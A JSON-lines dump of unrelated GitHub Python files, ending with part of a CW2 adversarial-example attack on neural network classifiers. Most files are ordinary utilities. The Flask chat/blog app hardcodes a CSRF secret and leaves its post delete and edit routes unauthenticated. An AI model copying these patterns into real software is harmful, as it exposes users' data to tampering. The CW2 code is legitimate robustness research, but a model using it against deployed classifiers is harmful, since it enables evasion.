improved_accuracy=current_model_score - previous_model_score\n )\n logging.info(f\"Model evaluation artifact: {model_eval_artifact}\")\n return model_eval_artifact\n\n except Exception as e:\n raise CustomException(e, sys)\n\n","repo_name":"chetna-978/credit_default","sub_path":"credit_default/components/model_evaluation.py","file_name":"model_evaluation.py","file_ext":"py","file_size_in_byte":5368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26980115039","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import stats\n\nnp.random.seed(12345678)\n# x = np.random.random(10)\nx = np.array([1 + k for k in range(0, 36)])\n# y = np.random.random(10)\ny = np.array([7364, 6704, 6503, 6446, 6203, 6260, 6317, 6289, 6339, 6498, 6492, 6524, 6501, 6273, 6353, 6400, 6512, 6754, 6721, 6702, 6601, 6439, 6474, 6684, 6635, 6604, 6630, 6581, 6542, 6490, 6557, 6626, 6589, 6591, 6656, 6617])\n# slope, intercept, r_value, p_value, std_err = stats.linregress(x, y)\n\nnp_array = np.polyfit(x, y, 1)\nintercept = np_array[1]\nslope = np_array[0]\ny_reg = np.array([intercept + x_value*slope for x_value in x])\ny_changed_by_reg = y - y_reg\n\nslope, intercept, r_value, p_value, std_err = stats.linregress(y, y_reg)\n\nstd_y_reg = y_reg.std()\nstd_y = y.std()\nstd_y_changed_by_reg = y_changed_by_reg.std()\n\nprint('slope={}, intercept={}, str_err={}'.format(slope, intercept, std_err))\n\nprint(\"r-squared:\", r_value**2) # r-squared: 0.08040226853902833\n# Plot the data along with the fitted line\n\nplt.plot(x, y, 'o', label='original data')\nplt.plot(x, intercept + slope*x, 'r', label='fitted line')\nplt.legend()\nplt.show()\n\n\n","repo_name":"SertlAnalytics/PycharmProjects","sub_path":"Gaming/Stocks/pattern_test/run_plot_test.py","file_name":"run_plot_test.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"36260233061","text":"import json\nimport copy\n\nwith open('converter/base.json') as base_file:\n article_base = json.load(base_file)\n\n\ndef convert(json_string):\n data = json.loads(json_string)\n article = copy.deepcopy(article_base)\n try:\n article['identifier'] = data['id']\n article['title'] = title(data)\n article['subtitle'] = data['deck']\n article['components'] = createComponents(data)\n return article\n except:\n print('error')\n\n\ndef title(data):\n if 'display_headline' in data and data['display_headline'] != \"\":\n return data['display_headline']\n elif 'headline' in data and data['headline'] != \"\":\n return data['headline']\n elif 'short_headline' in data and data['short_headline'] != \"\":\n return data['short_headline']\n\n\ndef createComponents(data):\n return [x for x in [\n titleComponent(data),\n introComponent(data),\n headerComponent(data),\n bodyComponent(data),\n authorComponent(data),\n ] if x];\n\n\n# COMPONENTS\n\ndef titleComponent(data):\n return {\n 'role': 'title',\n 'layout': 'titleLayout',\n 'text': title(data),\n 'textStyle': 'titleStyle',\n }\n\n\ndef introComponent(data):\n return {\n 'role': 'intro',\n 'layout': 'introLayout',\n 'text': data['deck'],\n 'textStyle': 'introStyle'\n }\n\n\ndef headerComponent(data):\n if 'image' in data:\n return {\n 'role': 'header',\n 'layout': 'headerImageLayout',\n 'style': {\n 'fill': {\n 'type': 'image',\n 'URL': data['image']['article_superhero_large'],\n 'fillMode': 'cover',\n 'verticalAlignment': 'center',\n }\n }\n }\n\n\ndef 
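The plotting script above fits the same line twice, once with np.polyfit and once with scipy.stats.linregress. A quick sketch confirming the two routines agree on slope and intercept (illustrative data, not the original series):

```python
import numpy as np
from scipy import stats

x = np.arange(1, 11, dtype=float)
y = 3.0 * x + 2.0 + np.random.default_rng(0).normal(0, 0.1, x.size)

# np.polyfit returns coefficients highest-degree first: [slope, intercept].
slope_p, intercept_p = np.polyfit(x, y, 1)
res = stats.linregress(x, y)

# Both routines solve the same least-squares problem.
assert np.isclose(slope_p, res.slope)
assert np.isclose(intercept_p, res.intercept)
```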
bodyComponent(data):\n content = ''.join([i for i in data['body'] if type(i) == str])\n return {\n 'role': 'body',\n 'text': content,\n 'format': 'html',\n 'layout': 'bodyLayout',\n 'textStyle': 'bodyStyle',\n }\n\n\ndef authorComponent(data):\n author = data['authors'][0];\n return {\n 'role': 'author',\n 'layout': 'authorLayout',\n 'text': '{}, {} | {}'.format(author['name'], author['role'], data['hero']['pubdate']),\n 'textStyle': 'authorStyle'\n }\n","repo_name":"danfujita/article-converter","sub_path":"converter/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19806648936","text":"\n# function to return the count of passed series or list\n\n\ndef count(data):\n total_count = len(data)\n return total_count\n\n\n# function to return the required dataframe or series\n\ndef get_data(dataframe,required_column_list):\n dataframe = dataframe[required_column_list]\n return dataframe\n\n\n# function to plot bar chart\n\ndef plot_bar(plotly_obj, dataframe, x_axis, y_axis, plot_title):\n\n fig = plotly_obj.bar(dataframe, x=x_axis,\n y=y_axis,\n text=y_axis,\n )\n\n fig.update_traces(width=0.5,\n textposition='outside',\n marker_color='#F2BB05',\n hovertemplate = None,\n hoverinfo= 'skip',\n )\n\n fig.update_yaxes(visible=False)\n\n fig.update_xaxes({'type' : 'category'})\n\n fig.update_layout(title_text=''+ plot_title +'',\n title_x=0.5, title_y=0.95,\n uniformtext_minsize=8,\n uniformtext_mode='hide',\n xaxis_title=None,\n plot_bgcolor = '#0F0A0A')\n return fig\n\n\ndef get_grouped_data(dataframe,group_by_col, to_be_grouped):\n wc_matches_v1_grouped = dataframe.groupby(group_by_col)[to_be_grouped].sum().reset_index()\n return wc_matches_v1_grouped\n\n\ndef get_wc_matches_v1(dataframe, own_goal=False, filter_year=0, filter_country=''):\n req_cols = ['year', 'country', 'player_id', 'player_name', 'home_goals', 'away_goals', 'own_goal']\n dataframe = dataframe[req_cols]\n dataframe['goals'] = dataframe['home_goals'] + dataframe['away_goals']\n\n if filter_year != 0:\n filter_1 = dataframe['year'] == filter_year\n dataframe = dataframe[filter_1]\n\n if filter_country != '':\n filter_1 = dataframe['country'] == filter_country\n dataframe = dataframe[filter_1]\n\n if (own_goal):\n dataframe = dataframe[dataframe['own_goal'] == 0]\n\n return dataframe\n\n# function to get total world cups played\n\n\ndef get_total_wc_played(dataframe):\n req_col = ['edition']\n total_wc_played = get_data(dataframe,req_col).iloc[-1].values[0]\n return total_wc_played\n\n\n# total participating nations list\ndef get_total_participating_nations(dataframe,filter_year=0):\n req_col = 'country'\n if filter_year == 0:\n participating_nations = dataframe[req_col].unique()\n return participating_nations\n else:\n filter_1 = dataframe['year'] == filter_year\n participating_nations = dataframe[filter_1][req_col].unique()\n return participating_nations\n\n\n# Country and World Cup Win Freqency\n\ndef get_world_cup_win_frequency(dataframe):\n bar_data = dataframe['first'].value_counts().reset_index().rename(columns={'index': 'country', 'first': 'no_of_wins'})\n return bar_data\n\n# getting the list of year to add to the select box\n\n\ndef get_years_list(dataframe):\n year_list = dataframe['year'].tolist()\n return year_list;\n\n# using this function first,second, third, hosting_country and total_attendance\n# will be extracted for a given year\n\n\ndef 
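A short usage sketch for the converter above, assuming the module imported successfully (it reads converter/base.json at import time); the payload fields mirror the accessors in the code, and the values are hypothetical:

```python
import json

payload = json.dumps({
    "id": "article-1",
    "headline": "Example headline",
    "display_headline": "",
    "short_headline": "",
    "deck": "A one-line summary.",
    "body": ["<p>First paragraph.</p>", {"embed": "skipped"}, "<p>Second.</p>"],
    "authors": [{"name": "A. Writer", "role": "Reporter"}],
    "hero": {"pubdate": "2020-01-01"},
})

article = convert(payload)   # convert() from this module
print(article["title"])      # falls back to 'headline' since display_headline is empty
```

Because there is no 'image' key, headerComponent returns None and createComponents filters it out, so the article carries only title, intro, body, and author components.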
get_yearly_overall_data(dataframe,selected_year,column_name):\n    filter_year = dataframe['year'] == selected_year\n    dataframe = dataframe[filter_year]\n    data = dataframe[column_name].values[0]\n    return data\n\n\n# getting the participation years of given country\n\ndef get_country_participation_years(dataframe,filter_country):\n    req_col = 'year'\n    filter_1 = dataframe['country'] == filter_country\n    participating_years = dataframe[filter_1][req_col].unique()\n    return participating_years\n\n\n# given a country how many times it won a world cup, first position, second position\n\ndef country_wc_win_position(dataframe,country_filter,pos):\n    if pos == 1:\n        filter_1 = dataframe['first'] == country_filter\n        total_first = sum(filter_1)\n        return total_first\n    elif pos == 2:\n        filter_1 = dataframe['second'] == country_filter\n        total_second = sum(filter_1)\n        return total_second\n    elif pos == 3:\n        filter_1 = dataframe['third'] == country_filter\n        total_third = sum(filter_1)\n        return total_third\n\n\n","repo_name":"sudarshanAw/fifa-wc-analysis-app","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":4189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"5764058012","text":"import unittest\nfrom metro.station.station_class import *\nfrom metro.network.network_class import *\nfrom metro.helpers.file_helper import *\nfrom metro.const import *\nfrom metro.main import *\n\ninput = read_json_input('metro/inputs/input_1.json')\n\nclass TestNetwork(unittest.TestCase):\n    \n    stations = create_stations(input[\"stations\"])\n    link_stations(stations, input[\"stations\"])\n    network = create_network(stations, input[\"train color\"])\n    start_station = stations[input[\"start\"]]\n    train_colors = [None, GREEN, RED]\n    \n    def test_search_algorithm(self):\n        '''\n        Check that the search algorithm returns valid dictionaries,\n        including the station instances with their respective\n        previous stations.\n        '''\n        previous_stations, shortest_path = search_algorithm(self.network, self.start_station) \n        message_station_instance = \"given object is not an instance of Station.\"\n        message_cost = \"invalid path cost\"\n\n        for key, value in previous_stations.items():\n            self.assertIsInstance(key, Station, message_station_instance)\n            self.assertIsInstance(value, Station, message_station_instance)\n        for key, value in shortest_path.items():\n            self.assertIsInstance(key, Station, message_station_instance)\n            self.assertTrue(0 <= value <= MAX_VALUE, message_cost) # also confirms the value is numeric\n\nif __name__ == '__main__':\n    unittest.main()","repo_name":"snarriagada/Problema-metro","sub_path":"metro/tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"72733848802","text":"import os\nimport time\nfrom datetime import datetime\nfrom flask import Flask, render_template, request, redirect, url_for, flash\nfrom flask_login import LoginManager, login_user, current_user, logout_user\nfrom flask_socketio import SocketIO, join_room, leave_room, send\n\nfrom wtform_fields import *\nfrom models import *\n\n# Configure app\napp = Flask(__name__)\napp.secret_key=os.environ.get('SECRET')\napp.config['WTF_CSRF_SECRET_KEY'] = \"b'f\\xfa\\x8b{X\\x8b\\x9eM\\x83l\\x19\\xad\\x84\\x08\\xaa\"\napp.config['SQLALCHEMY_POOL_SIZE'] = 20\n\n# Configure 
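A small usage sketch for the helpers above, on a toy stand-in for the world-cup summary table (column naming of `value_counts().reset_index()` assumes the pandas 1.x behavior the helper was written against):

```python
import pandas as pd

wc = pd.DataFrame({
    "year": [1930, 1934, 1938],
    "first": ["Uruguay", "Italy", "Italy"],
})

wins = get_world_cup_win_frequency(wc)  # assumes helper.py is imported
print(wins)                  # Italy 2, Uruguay 1
print(count(wc["first"]))    # 3
```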
database\napp.config['SQLALCHEMY_DATABASE_URI']=os.environ.get('DATABASE_URL')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\n# Initialize login manager\nlogin = LoginManager(app)\nlogin.init_app(app)\n\n@login.user_loader\ndef load_user(id):\n return User.query.get(int(id))\n\nsocketio = SocketIO(app, manage_session=False)\n\n# Predefined rooms for chat\nROOMS = [\"lounge\", \"news\", \"games\", \"coding\"]\n\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef index():\n\n reg_form = RegistrationForm()\n\n # Update database if validation success\n if reg_form.validate_on_submit():\n username = reg_form.username.data\n password = reg_form.password.data\n\n # Hash password\n hashed_pswd = pbkdf2_sha256.hash(password)\n\n # Add username & hashed password to DB\n user = User(username=username, hashed_pswd=hashed_pswd)\n db.session.add(user)\n db.session.commit()\n\n flash('Registered successfully. Please login.', 'success')\n return redirect(url_for('login'))\n\n return render_template(\"index.html\", form=reg_form)\n\n\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n\n login_form = LoginForm()\n\n # Allow login if validation success\n if login_form.validate_on_submit():\n user_object = User.query.filter_by(username=login_form.username.data).first()\n login_user(user_object)\n return redirect(url_for('home'))\n\n return render_template(\"login.html\", form=login_form)\n\n\n@app.route(\"/logout\", methods=['GET'])\ndef logout():\n\n # Logout user\n logout_user()\n flash('You have logged out successfully', 'success')\n return redirect(url_for('login'))\n\n\n@app.route(\"/chat\", methods=['GET', 'POST'])\ndef chat():\n\n if not current_user.is_authenticated:\n flash('Please login', 'danger')\n return redirect(url_for('login'))\n\n return render_template(\"chat.html\", username=current_user.username, rooms=ROOMS)\n\n\n@app.route('/home')\ndef home():\n return render_template('home.html')\n\n@app.route('/lapa')\ndef lapa():\n return render_template('lapa.html')\n\n@app.route('/results')\ndef results():\n return render_template('results.html')\n\n\n@app.route('/about')\ndef contact():\n return render_template('contact.html')\n\n\nclass BlogPost(db.Model):\n __tablename__ = 'posts'\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(100), nullable=False)\n content = db.Column(db.Text, nullable=False)\n author = db.Column(db.String(20), nullable=False, default='N/A')\n date_posted = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)\n\n def __repr__(self):\n return 'Blog post ' + str(self.id)\n\n\n\n@app.route('/posts', methods=['GET', 'POST'])\ndef posts():\n\n if not current_user.is_authenticated:\n flash('Please login', 'danger')\n return redirect(url_for('login'))\n\n if request.method == 'POST':\n post_title = request.form['title']\n post_content = request.form['content']\n post_author = request.form['author']\n new_post = BlogPost(title=post_title, content=post_content, author=post_author)\n db.session.add(new_post)\n db.session.commit()\n return redirect('/posts')\n else:\n all_posts = BlogPost.query.order_by(BlogPost.date_posted).all()\n return render_template('posts.html', username=current_user.username, posts=all_posts)\n\n@app.route('/posts/delete/')\ndef delete(id):\n post = BlogPost.query.get_or_404(id)\n db.session.delete(post)\n db.session.commit()\n return redirect('/posts')\n\n@app.route('/posts/edit/', methods=['GET', 'POST'])\ndef edit(id):\n \n post = BlogPost.query.get_or_404(id)\n\n if 
request.method == 'POST':\n        post.title = request.form['title']\n        post.author = request.form['author']\n        post.content = request.form['content']\n        db.session.commit()\n        return redirect('/posts')\n    else:\n        return render_template('edit.html', post=post)\n\n@app.route('/posts/new', methods=['GET', 'POST'])\ndef new_post():\n    if request.method == 'POST':\n        post_title = request.form['title']\n        post_author = request.form['author']\n        post_content = request.form['content']\n        new_post = BlogPost(title=post_title, content=post_content, author=post_author)\n        db.session.add(new_post)\n        db.session.commit()\n        return redirect('/posts')\n    else:\n        return render_template('new_post.html')\n\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n    # note that we set the 404 status explicitly\n    return render_template('404.html'), 404\n\n\n@socketio.on('incoming-msg')\ndef on_message(data):\n    \"\"\"Broadcast messages\"\"\"\n\n    msg = data[\"msg\"]\n    username = data[\"username\"]\n    room = data[\"room\"]\n    # Set timestamp\n    time_stamp = time.strftime('%b-%d %I:%M%p', time.localtime())\n    send({\"username\": username, \"msg\": msg, \"time_stamp\": time_stamp}, room=room)\n\n\n@socketio.on('join')\ndef on_join(data):\n    \"\"\"User joins a room\"\"\"\n\n    username = data[\"username\"]\n    room = data[\"room\"]\n    join_room(room)\n\n    # Broadcast that new user has joined\n    send({\"msg\": username + \" has joined the \" + room + \" room.\"}, room=room)\n\n\n@socketio.on('leave')\ndef on_leave(data):\n    \"\"\"User leaves a room\"\"\"\n\n    username = data['username']\n    room = data['room']\n    leave_room(room)\n    send({\"msg\": username + \" has left the room\"}, room=room)\n\n\n\n\nif __name__ == \"__main__\":\n    app.run()\n","repo_name":"ValtersHuns/aaaa","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":5987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"14057064457","text":"from util import data_loader, label_generator\n\nimport datetime\nimport glob\nimport os\nimport time\n\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import accuracy_score\n\n\ndef sklearn_lr(shuffle=True):\n    \"\"\"Function to perform linear regression using scikit-learn library.\n    We want to perform a binary classification, so we classify from the output of the regression.\n    Arg:\n        shuffle := bool type flag to split train and valid data randomly(default=True)\n    \"\"\"\n    ##Get path delimiter (\"/\" or \"\\\") depending on OS\n    SEP = os.sep\n    ## Get the current time as a string (e.g.) July 28, 2021 18:40:39 => 20210728184039\n    dt_now = datetime.datetime.now()\n    dt_index = dt_now.strftime(\"%Y%m%d%H%M%S\")\n    \n    ##input the filename\n    print(\"input dataset : \", end=(\"\"))\n    data_name = input()\n    if not os.path.isdir(\"datasets\" + SEP + data_name):\n        print('ERROR: Cannot find the dataset \"{}\"'.format(data_name))\n        return -1\n    ##make a directory path to save linear regression results\n    ##(e.g. 
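chat() and posts() in the Flask app above guard authentication by hand inside each view; the same check can be expressed once with a decorator built on the flask_login imports the app already has (a sketch; the helper name is hypothetical and the redirect mirrors the manual version):

```python
from functools import wraps
from flask import flash, redirect, url_for
from flask_login import current_user

def login_required_flash(view):
    # Drop-in replacement for the repeated "if not authenticated" blocks.
    @wraps(view)
    def wrapped(*args, **kwargs):
        if not current_user.is_authenticated:
            flash('Please login', 'danger')
            return redirect(url_for('login'))
        return view(*args, **kwargs)
    return wrapped
```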
datasets/dataset1/LR/20210729123234/)\n dir_path = \"datasets\" + SEP + data_name + SEP + \"LR\" + SEP + dt_index + SEP\n ##Create a directory to store the results\n os.makedirs(dir_path)\n\n ##Read the dataset\n train_data, train_label, valid_data, valid_label, test_dataset, test_labelset \\\n = data_loader.load_data(\"LR\", data_name, dt_index)\n\n if shuffle:\n ##set the seed\n seed = np.random.randint(2**31)\n ##Combine training and validation data and divide randomly\n num_train_data = train_data.shape[0]\n temp_data = np.concatenate([train_data, valid_data], axis=0)\n temp_label = np.concatenate([train_label, valid_label], axis=0)\n from sklearn.model_selection import train_test_split\n train_data, valid_data, train_label, valid_label = train_test_split(temp_data, temp_label, train_size=num_train_data, random_state=seed)\n\n ## define a model set to do normalization\n lr = LinearRegression(normalize=True, n_jobs=-1)\n\n ##start training\n print(\"\\r\" + \"fitting...\", end=\"\")\n start = time.perf_counter()\n lr.fit(train_data, train_label)\n finish = time.perf_counter()\n\n ##Output time spent on training\n print(\"\\r\" + \"fit time : {}[s]\".format(finish-start))\n\n ##Make a directory to save the labels of the predictions output by the regression model.\n label_path = dir_path + \"predicted_labels\" + SEP \n os.makedirs(label_path)\n ##Prepare a text file to save the training results(discrimination accuracy) of linear regression.\n result_file = open(dir_path+\"result.txt\", mode=\"w\")\n\n ##Get predictive labels for training data\n predicted_train = label_generator.scaler_to_label(lr.predict(train_data))\n ##Calculate identification accuracy(TP/(TP+FP)) and output\n train_acc = accuracy_score(train_label, predicted_train)\n print(\"\\ntrain :\", train_acc)\n ##Save identification accuracy and identification results\n result_file.write(\"train : {}\\n\".format(train_acc))\n np.save(label_path+\"train_predicted_label\", predicted_train)\n\n ##Get predictive labels for validation data\n predicted_valid = label_generator.scaler_to_label(lr.predict(valid_data))\n ##Calculate identification accuracy(TP/(TP+FP)) and output\n valid_acc = accuracy_score(valid_label, predicted_valid)\n print(\"valid :\", valid_acc)\n ##Save identification accuracy and identification results\n result_file.write(\"valid : {}\\n\".format(valid_acc))\n np.save(label_path+\"valid_predicted_label\", predicted_valid)\n\n ##result of test data\n for i in range(len(test_dataset)):\n ##Get predictive labels for test data\n predicted_test = label_generator.scaler_to_label(lr.predict(test_dataset[i]))\n ##Calculate identification accuracy(TP/(TP+FP)) and output\n test_acc = accuracy_score(test_labelset[i], predicted_test)\n print(\"test{} : {}\".format(i+1, test_acc))\n ##Save identification accuracy and identification results\n result_file.write(\"test{} : {}\\n\".format(i+1, test_acc))\n np.save(label_path+\"test{}_predicted_label\".format(i+1), predicted_test)\n \n ##Close text file to save linearSVM results\n result_file.close()\n\n ##Save parameters, etc.\n with open(dir_path+\"paras.txt\", mode=\"w\") as f:\n f.write(\"fit time : {}\\n\".format(finish-start))\n f.write(\"shuffle : {}\\n\".format(shuffle))\n if shuffle:\n f.write(\"seed : {}\\n\".format(seed))\n\nif __name__ == \"__main__\":\n 
sklearn_lr(shuffle=True)","repo_name":"mf-22/t-design_MPbased_cpp","sub_path":"ml/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":4591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72802939043","text":"import pandas as pd\nimport numpy as np\nfrom common.sheetOperations import SheetOps\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nobj = SheetOps()\n\nno_of_past_candles = 20 #configurable\ndf = pd.read_csv('Investing/d_csv/TATASTEEL_5.csv')\n\n\nslice = df.iloc[:no_of_past_candles]\nprint(len(slice.index))\n\n\n\ndef get_outliers(df, column_name):\n try:\n mn = df[column_name].mean()\n sd = df[column_name].std()\n final_list = [x for x in df[column_name] if (x > mn - 2 * sd)]\n final_list = [x for x in final_list if (x < mn + 2 * sd)]\n list_of_outliers = list(set(df[column_name].values.tolist()) - set(final_list))\n return list_of_outliers\n #return sorted(list_of_outliers, reverse=True)\n except Exception as e:\n print('Exception in getting list of outliers', e)\n return []\n\ncolumns_to_write = ['datetime', 'symbol', 'pid', 'resolution', 'close',\n 'volume', 'per_change', 'volume_high_count', 'close_count', 'per_change_count']\nslice = slice[columns_to_write]\noutliers_close_rows = slice[slice.close_count.isin(get_outliers(slice, 'close_count'))]\noutliers_volume_rows = slice[slice.volume_high_count.isin(get_outliers(slice, 'volume_high_count'))]\noutliers_per_rows = slice[slice.per_change_count.isin(get_outliers(slice, 'per_change_count'))]\n\nprint(outliers_close_rows)\ndef write_sheet(write_list, l, position=-1):\n for wl in write_list:\n if position != -1 and len(l) == 0:\n wl[position] = ' '\n if position == -1 and len(l) != 0:\n for i in l:\n wl[i] = ' '\n obj.writeSheet('CIEnotifications', wl, 'InvestingNotify')\n\n#all three\ntemp = pd.merge(outliers_close_rows, outliers_volume_rows, how='inner', on=columns_to_write)\nocr_ovr_opr = pd.merge(temp, outliers_per_rows, how='inner', on=columns_to_write)\n#ocr_ovr_opr = pd.concat([outliers_close_rows, outliers_volume_rows, outliers_per_rows], axis=1, join='inner')\nif len(ocr_ovr_opr) !=0:\n # write sheet\n write_list = ocr_ovr_opr.values.tolist()\n write_sheet(write_list, [], -2)\n for dt in ocr_ovr_opr['datetime']:\n outliers_close_rows.drop(outliers_close_rows[outliers_close_rows['datetime'] == dt].index, inplace=True)\n outliers_volume_rows.drop(outliers_volume_rows[outliers_volume_rows['datetime'] == dt].index, inplace=True)\n outliers_close_rows.drop(outliers_per_rows[outliers_per_rows['datetime'] == dt].index, inplace=True)\n\n#any two\nocr_ovr = pd.merge(outliers_close_rows, outliers_volume_rows, how='inner', on=columns_to_write)\n# ocr_ovr = pd.concat([outliers_close_rows, outliers_volume_rows], axis=1, join='inner')\n\nif len(ocr_ovr) != 0:\n # write sheet\n write_list = ocr_ovr.values.tolist()\n write_sheet(write_list, [columns_to_write.index('per_change_count'),columns_to_write.index('per_change')], position=-1)\n for dt in ocr_ovr['datetime']:\n outliers_close_rows.drop(outliers_close_rows[outliers_close_rows['datetime'] == dt].index, inplace=True)\n outliers_volume_rows.drop(outliers_volume_rows[outliers_volume_rows['datetime'] == dt].index, inplace=True)\n\n\nocr_opr = pd.merge(outliers_close_rows, outliers_per_rows, how='inner', on=columns_to_write)\nif len(ocr_opr) != 0:\n # write sheet\n write_list = ocr_opr.values.tolist()\n write_sheet(write_list, 
[columns_to_write.index('volume'),columns_to_write.index('volume_high_count')], position=-1)\n    for dt in ocr_opr['datetime']:\n        outliers_close_rows.drop(outliers_close_rows[outliers_close_rows['datetime'] == dt].index, inplace=True)\n        outliers_per_rows.drop(outliers_per_rows[outliers_per_rows['datetime'] == dt].index, inplace=True)\n#\novr_opr = pd.merge(outliers_volume_rows, outliers_per_rows, how='inner', on=columns_to_write)\nif len(ovr_opr) != 0:\n    # write sheet\n    write_list = ovr_opr.values.tolist()\n    write_sheet(write_list, [columns_to_write.index('close'),columns_to_write.index('close_count')], position=-1)\n    for dt in ovr_opr['datetime']:\n        outliers_volume_rows.drop(outliers_volume_rows[outliers_volume_rows['datetime'] == dt].index, inplace=True)\n        outliers_per_rows.drop(outliers_per_rows[outliers_per_rows['datetime'] == dt].index, inplace=True)\n\n\n# write remaining sheets\nif len(outliers_close_rows) != 0:\n    #write sheet\n    write_list = outliers_close_rows.values.tolist()\n    write_sheet(write_list, [columns_to_write.index('volume'),columns_to_write.index('per_change'),\n                             columns_to_write.index('volume_high_count'), columns_to_write.index('per_change_count')], -1)\n\nif len(outliers_volume_rows) != 0:\n    # write sheet\n    write_list = outliers_volume_rows.values.tolist()\n    write_sheet(write_list, [columns_to_write.index('close'),columns_to_write.index('per_change'),\n                             columns_to_write.index('close_count'), columns_to_write.index('per_change_count')], -1)\n\nif len(outliers_per_rows) !=0:\n    # write sheet\n    write_list = outliers_per_rows.values.tolist()\n    write_sheet(write_list, [columns_to_write.index('close'),columns_to_write.index('volume'),\n                             columns_to_write.index('volume_high_count'), columns_to_write.index('close_count')], -1)\n\n#\n\n\n\n\n\n\n","repo_name":"akewarmayur/StocksAnalysis","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"3243334334","text":"entrada = str(input(\"type something: \"))\r\nletra = 0 \r\nnum = 0\r\nfor x in entrada:\r\n\tif x.isdigit():\r\n\t\tnum += 1\r\n\telif x.isalpha():\r\n\t\tletra += 1\r\n\telif x.isspace():\r\n\t\tletra += 1\r\n\r\nprint(f\"Letters: {letra}\\nDigits: {num}\")\r\n\r\n\r\n","repo_name":"bbrecht02/aprendendo.py","sub_path":"listafinal/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"27680297698","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# References: N. Carlini and D. 
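get_outliers above flags values more than two standard deviations from the column mean. A self-contained demo of that rule on a tiny frame (values are illustrative):

```python
import pandas as pd

df = pd.DataFrame({"close_count": [1, 2, 2, 3, 2, 50]})

mn = df["close_count"].mean()
sd = df["close_count"].std()
# Complement of the "keep" condition used by get_outliers: values inside
# (mean - 2*std, mean + 2*std) are kept, everything else is an outlier.
outliers = [x for x in df["close_count"] if x <= mn - 2 * sd or x >= mn + 2 * sd]
print(outliers)  # [50]
```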
Wagner, \"Towards evaluating the robustness of neural networks,\" in S&P, 2017.\n# Reference Implementation from Authors (TensorFlow): https://github.com/carlini/nn_robust_attacks\n# **************************************\n# @Time : 2018/10/17 23:03\n# @Author : Saizuo Wang & Xiang Ling & Jiannan Wang\n# @Lab : nesa.zju.edu.cn\n# @File : CW2.py\n# **************************************\n\n\nimport math\n\nimport numpy as np\nimport torch\n\nfrom Attacks.AttackMethods.AttackUtils import tensor2variable\nfrom Attacks.AttackMethods.attacks import Attack\n\n\nclass CW2Attack(Attack):\n\n def __init__(self, model=None, kappa=0, init_const=0.001, lr=0.02, binary_search_steps=5, max_iters=10000, lower_bound=0.0, upper_bound=1.0):\n \"\"\"\n\n :param model:\n :param kappa:\n :param init_const:\n :param lr:\n :param binary_search_steps:\n :param max_iters:\n :param lower_bound:\n :param upper_bound:\n \"\"\"\n super(CW2Attack, self).__init__(model=model)\n self.model = model\n\n self.kappa = kappa * 1.0\n self.learning_rate = lr\n self.init_const = init_const\n self.lower_bound = lower_bound\n self.upper_bound = upper_bound\n self.max_iterations = max_iters\n self.binary_search_steps = binary_search_steps\n\n def perturbation(self, samples, ys_targets, batch_size, device):\n \"\"\"\n\n :param samples:\n :param ys_targets:\n :param batch_size:\n :param device:\n :return:\n \"\"\"\n assert len(samples) == batch_size, \"the length of sample is not equal to the batch_size\"\n\n # transform the samples [lower, upper] to [-1, 1] and then to the arctanh space\n mid_point = (self.upper_bound + self.lower_bound) * 0.5\n half_range = (self.upper_bound - self.lower_bound) * 0.5\n arctanh_samples = np.arctanh((samples - mid_point) / half_range * 0.9999)\n var_samples = tensor2variable(torch.from_numpy(arctanh_samples), device=device, requires_grad=True)\n\n # set the lower and upper bound for searching 'c' const in the CW2 attack\n const_origin = np.ones(shape=batch_size, dtype=float) * self.init_const\n c_upper_bound = [1e10] * batch_size\n c_lower_bound = np.zeros(batch_size)\n\n # convert targets to one hot encoder\n temp_one_hot_matrix = np.eye(10)\n targets_in_one_hot = []\n for i in range(batch_size):\n current_target = temp_one_hot_matrix[ys_targets[i]]\n targets_in_one_hot.append(current_target)\n targets_in_one_hot = tensor2variable(torch.FloatTensor(np.array(targets_in_one_hot)), device=device)\n\n best_l2 = [1e10] * batch_size\n best_perturbation = np.zeros(var_samples.size())\n current_prediction_class = [-1] * batch_size\n\n def attack_achieved(pre_softmax, target_class):\n pre_softmax[target_class] -= self.kappa\n return np.argmax(pre_softmax) == target_class\n\n self.model.eval()\n # Outer loop for linearly searching for c\n for search_for_c in range(self.binary_search_steps):\n\n modifier = torch.zeros(var_samples.size()).float()\n modifier = tensor2variable(modifier, device=device, requires_grad=True)\n optimizer = torch.optim.Adam([modifier], lr=self.learning_rate)\n var_const = tensor2variable(torch.FloatTensor(const_origin), device=device)\n print(\"\\tbinary search step {}:\".format(search_for_c))\n\n for iteration_times in range(self.max_iterations):\n # inverse the transform tanh -> [0, 